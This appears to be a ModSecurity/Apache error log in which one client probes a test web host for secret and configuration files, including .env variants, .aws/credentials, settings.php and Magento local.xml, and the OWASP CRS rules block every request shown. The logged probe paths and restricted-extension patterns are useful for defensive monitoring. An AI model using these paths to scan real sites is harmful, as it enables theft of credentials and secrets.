[tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWd4bPL7maAL7YwXfyRGCAAAAAY"]
[Wed Jan 14 12:05:16.929787 2026] [:error] [pid 1401182] [client 35.180.113.122:48736] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWd4bPL7maAL7YwXfyRGCAAAAAY"]
[Wed Jan 14 12:05:16.930001 2026] [:error] [pid 1401182] [client 35.180.113.122:48736] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWd4bPL7maAL7YwXfyRGCAAAAAY"]
[Wed Jan 14 12:05:16.930174 2026] [:error] [pid 1401182] [client 35.180.113.122:48736] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWd4bPL7maAL7YwXfyRGCAAAAAY"]
[Wed Jan 14 12:05:17.009018 2026] [:error] [pid 1400439] [client 35.180.113.122:48780] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWd4bRZiJWN5ANZoWOd03AAAAAE"]
[Wed Jan 14 12:05:17.009180 2026] [:error] [pid 1400439] [client 35.180.113.122:48780] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWd4bRZiJWN5ANZoWOd03AAAAAE"]
[Wed Jan 14 12:05:17.009381 2026] [:error] [pid 1400439] [client 35.180.113.122:48780] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWd4bRZiJWN5ANZoWOd03AAAAAE"]
[Wed Jan 14 12:05:17.009539 2026] [:error] [pid 1400439] [client 35.180.113.122:48780] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWd4bRZiJWN5ANZoWOd03AAAAAE"]
[Wed Jan 14 12:05:17.171962 2026] [authz_core:error] [pid 1400440] [client 35.180.113.122:48868] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
[Wed Jan 14 12:05:17.414125 2026] [:error] [pid 1400463] [client 35.180.113.122:48990] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWd4bRBlpHg03ETPJhlXHwAAAAU"]
[Wed Jan 14 12:05:17.414364 2026] [:error] [pid 1400463] [client 35.180.113.122:48990] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWd4bRBlpHg03ETPJhlXHwAAAAU"]
[Wed Jan 14 12:05:17.414525 2026] [:error] [pid 1400463] [client 35.180.113.122:48990] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWd4bRBlpHg03ETPJhlXHwAAAAU"]
[Wed Jan 14 12:05:17.496239 2026] [:error] [pid 1405561] [client 35.180.113.122:49018] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWd4bTszkuqYgM6kDsoCqgAAAAc"]
[Wed Jan 14 12:05:17.496554 2026] [:error] [pid 1405561] [client 35.180.113.122:49018] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWd4bTszkuqYgM6kDsoCqgAAAAc"]
[Wed Jan 14 12:05:17.496781 2026] [:error] [pid 1405561] [client 35.180.113.122:49018] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWd4bTszkuqYgM6kDsoCqgAAAAc"]
[Wed Jan 14 12:05:17.581532 2026] [:error] [pid 1400438] [client 35.180.113.122:49056] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWd4bUBaCnzgGdZXs4_g6wAAAAA"]
[Wed Jan 14 12:05:17.581790 2026] [:error] [pid 1400438] [client 35.180.113.122:49056] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWd4bUBaCnzgGdZXs4_g6wAAAAA"]
[Wed Jan 14 12:05:17.581965 2026] [:error] [pid 1400438] [client 35.180.113.122:49056] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWd4bUBaCnzgGdZXs4_g6wAAAAA"]
[Wed Jan 14 12:05:17.746846 2026] [:error] [pid 1400439] [client 35.180.113.122:49152] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWd4bRZiJWN5ANZoWOd03QAAAAE"]
[Wed Jan 14 12:05:17.747000 2026] [:error] [pid 1400439] [client 35.180.113.122:49152] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWd4bRZiJWN5ANZoWOd03QAAAAE"]
[Wed Jan 14 12:05:17.747213 2026] [:error] [pid 1400439] [client 35.180.113.122:49152] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWd4bRZiJWN5ANZoWOd03QAAAAE"]
[Wed Jan 14 12:05:17.747368 2026] [:error] [pid 1400439] [client 35.180.113.122:49152] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWd4bRZiJWN5ANZoWOd03QAAAAE"]
[Wed Jan 14 12:05:17.838115 2026] [:error] [pid 1409076] [client 35.180.113.122:49190] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWd4bUtembrIGtEDNjOE-wAAAAg"]
[Wed Jan 14 12:05:17.838394 2026] [:error] [pid 1409076] [client 35.180.113.122:49190] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWd4bUtembrIGtEDNjOE-wAAAAg"]
[Wed Jan 14 12:05:17.838562 2026] [:error] [pid 1409076] [client 35.180.113.122:49190] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWd4bUtembrIGtEDNjOE-wAAAAg"]
[Wed Jan 14 12:05:17.921217 2026] [:error] [pid 1400440] [client 35.180.113.122:49240] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWd4behQc121WA46NGcXzgAAAAI"]
[Wed Jan 14 12:05:17.921518 2026] [:error] [pid 1400440] [client 35.180.113.122:49240] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWd4behQc121WA46NGcXzgAAAAI"]
[Wed Jan 14 12:05:17.921740 2026] [:error] [pid 1400440] [client 35.180.113.122:49240] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWd4behQc121WA46NGcXzgAAAAI"]
[Wed Jan 14 12:05:18.082574 2026] [:error] [pid 1400441] [client 35.180.113.122:49330] [client 35.180.113.122] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWd4bvDQTrRwdMNdhh-myQAAAAM"]
[Wed Jan 14 12:05:18.082828 2026] [:error] [pid 1400441] [client 35.180.113.122:49330] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWd4bvDQTrRwdMNdhh-myQAAAAM"]
[Wed Jan 14 12:05:18.083020 2026] [:error] [pid 1400441] [client 35.180.113.122:49330] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWd4bvDQTrRwdMNdhh-myQAAAAM"]
[Wed Jan 14 12:05:18.163025 2026] [authz_core:error] [pid 1400463] [client 35.180.113.122:49366] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Wed Jan 14 12:05:18.329584 2026] [:error] [pid 1400438] [client 35.180.113.122:49442] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWd4bkBaCnzgGdZXs4_g7AAAAAA"]
[Wed Jan 14 12:05:18.329797 2026] [:error] [pid 1400438] [client 35.180.113.122:49442] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWd4bkBaCnzgGdZXs4_g7AAAAAA"]
[Wed Jan 14 12:05:18.329978 2026] [:error] [pid 1400438] [client 35.180.113.122:49442] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWd4bkBaCnzgGdZXs4_g7AAAAAA"]
[Wed Jan 14 12:05:18.409094 2026] [:error] [pid 1401182] [client 35.180.113.122:49486] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWd4bvL7maAL7YwXfyRGCgAAAAY"]
[Wed Jan 14 12:05:18.409311 2026] [:error] [pid 1401182] [client 35.180.113.122:49486] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWd4bvL7maAL7YwXfyRGCgAAAAY"]
[Wed Jan 14 12:05:18.409493 2026] [:error] [pid 1401182] [client 35.180.113.122:49486] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWd4bvL7maAL7YwXfyRGCgAAAAY"]
[Wed Jan 14 12:05:18.489884 2026] [:error] [pid 1400439] [client 35.180.113.122:49522] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWd4bhZiJWN5ANZoWOd03gAAAAE"]
